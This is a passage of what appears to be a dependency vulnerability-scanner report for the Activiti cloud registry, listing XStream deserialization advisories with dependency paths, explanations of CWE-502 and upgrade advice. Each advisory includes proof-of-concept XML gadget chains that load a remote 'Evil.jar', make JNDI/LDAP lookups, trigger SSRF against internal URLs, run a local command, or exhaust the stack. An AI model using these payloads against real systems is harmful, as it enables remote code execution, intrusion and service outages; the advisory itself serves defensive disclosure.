                        </registry>
                        <host>ip2</host>
                        <port>1099</port>
                      </ctx>
                    </candidates>
                  </aliases>
                </it>
              </mm>
            </multiPart>
          </sm>
        </message>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.17 or higher.

References

Deserialization of Untrusted Data vulnerability report

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
                <names class='java.util.AbstractList$Itr'>
                  <cursor>0</cursor>
                  <lastRet>-1</lastRet>
                  <expectedModCount>0</expectedModCount>
                  <outer-class class='java.util.Arrays$ArrayList'>
                    <a class='string-array'>
                      <string>Evil</string>
                    </a>
                  </outer-class>
                </names>
                <processorCL class='java.net.URLClassLoader'>
                  <ucp class='sun.misc.URLClassPath'>
                    <urls serialization='custom'>
                      <unserializable-parents/>
                      <vector>
                        <default>
                          <capacityIncrement>0</capacityIncrement>
                          <elementCount>1</elementCount>
                          <elementData>
                            <url>http://127.0.0.1:80/Evil.jar</url>
                          </elementData>
                        </default>
                      </vector>
                    </urls>
                    <path>
                      <url>http://127.0.0.1:80/Evil.jar</url>
                    </path>
                    <loaders/>
                    <lmap/>
                  </ucp>
                  <package2certs class='concurrent-hash-map'/>
                  <classes/>
                  <defaultDomain>
                    <classloader class='java.net.URLClassLoader' reference='../..'/>
                    <principals/>
                    <hasAllPerm>false</hasAllPerm>
                    <staticPermissions>false</staticPermissions>
                    <key>
                      <outer-class reference='../..'/>
                    </key>
                  </defaultDomain>
                  <initialized>true</initialized>
                  <pdcache/>
                </processorCL>
              </iterator>
              <type>KEYS</type>
            </e>
            <in class='java.io.ByteArrayInputStream'>
              <buf></buf>
              <pos>-2147483648</pos>
              <mark>0</mark>
              <count>0</count>
            </in>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

References

Deserialization of Untrusted Data vulnerability report

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='javax.swing.MultiUIDefaults' serialization='custom'>
      <unserializable-parents/>
      <hashtable>
        <default>
          <loadFactor>0.75</loadFactor>
          <threshold>525</threshold>
        </default>
        <int>700</int>
        <int>0</int>
      </hashtable>
      <javax.swing.UIDefaults>
        <default>
          <defaultLocale>zh_CN</defaultLocale>
          <resourceCache/>
        </default>
      </javax.swing.UIDefaults>
      <javax.swing.MultiUIDefaults>
        <default>
          <tables>
            <javax.swing.UIDefaults serialization='custom'>
              <unserializable-parents/>
              <hashtable>
                <default>
                  <loadFactor>0.75</loadFactor>
                  <threshold>525</threshold>
                </default>
                <int>700</int>
                <int>1</int>
                <sun.swing.SwingLazyValue>
                  <className>javax.naming.InitialContext</className>
                  <methodName>doLookup</methodName>
                  <args>
                    <arg>ldap://localhost:1099/CallRemoteMethod</arg>
                  </args>
                </sun.swing.SwingLazyValue>
              </hashtable>
              <javax.swing.UIDefaults>
                <default>
                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
                  <resourceCache/>
                </default>
              </javax.swing.UIDefaults>
            </javax.swing.UIDefaults>
          </tables>
        </default>
      </javax.swing.MultiUIDefaults>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

References

Deserialization of Untrusted Data vulnerability report

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available (SSRF) only by manipulating the processed input stream.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.xml.internal.ws.util.ServiceFinder$ServiceNameIterator'>
                <configs class='sun.misc.FIFOQueueEnumerator'>
                  <queue>
                    <length>1</length>
                    <head>
                      <obj class='url'>http://localhost:8080/internal/</obj>
                    </head>
                    <tail reference='../head'/>
                  </queue>
                  <cursor reference='../queue/head'/>
                </configs>
                <returned class='sorted-set'/>
              </iterator>
              <type>KEYS</type>
            </e>
            <in class='java.io.ByteArrayInputStream'>
              <buf></buf>
              <pos>0</pos>
              <mark>0</mark>
              <count>0</count>
            </in>
          </is>
          <consumed>false</consumed>
        </dataSource>
        <transferFlavors/>
      </dataHandler>
      <dataLen>0</dataLen>
    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

References

Deserialization of Untrusted Data vulnerability report

medium severity

Denial of Service (DoS)

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream at unmarshalling time, and replace or inject objects. This can result in a stack overflow calculating a recursive hash set, causing a denial of service.

Workaround

This effects of this vulnerability can be avoided by catching the StackOverflowError in the calling application.

PoC

Create a simple HashSet and use XStream to marshal it to XML. Replace the XML with following snippet and unmarshal it with XStream.

<div class="Source XML"><pre>
<set>
  <set>
    <set>
      <set>
        <set>
          <set>
            <string>a</string>
          </set>
          <set>
            <string>b</string>
          </set>
        </set>
        <set>
          <string>c</string>
          <set reference='../../../set/set[2]'/>
        </set>
      </set>
    </set>
  </set>
</set>;
</pre></div>
<div class="Source Java"><pre>XStream xstream = new XStream();
xstream.fromXML(xml);
</pre></div>

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.20 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker who has sufficient rights to execute local commands on the host only by manipulating the processed input stream.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
          <packet>
            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
                      <uriProperties/>
                      <attributeProperties/>
                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
                        <getter>
                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
                          <name>verify</name>
                          <parameter-types/>
                        </getter>
                      </inheritedAttWildcard>
                    </bi>
                    <tagName/>
                    <context>
                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
                        <outer-class reference='../..'/>
                      </marshallerPool>
                      <nameList>
                        <nsUriCannotBeDefaulted>
                          <boolean>true</boolean>
                        </nsUriCannotBeDefaulted>
                        <namespaceURIs>
                          <string>1</string>
                        </namespaceURIs>
                        <localNames>
                          <string>UTF-8</string>
                        </localNames>
                      </nameList>
                    </context>
                  </bridge>
                </bridge>
                <jaxbObject class='com.sun.corba.se.impl.activation.com.sun.corba.se.impl.activation.ServerTableEntry'>
                  <activationCmd>calc</activationCmd>
                </jaxbObject>
              </dataSource>
            </message>
            <satellites/>
            <invocationProperties/>
          </packet>
        </indexMap>
      </comparator>
    </default>
    <int>3</int>
    <string>javax.xml.ws.binding.attachments.inbound</string>
    <string>javax.xml.ws.binding.attachments.inbound</string>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

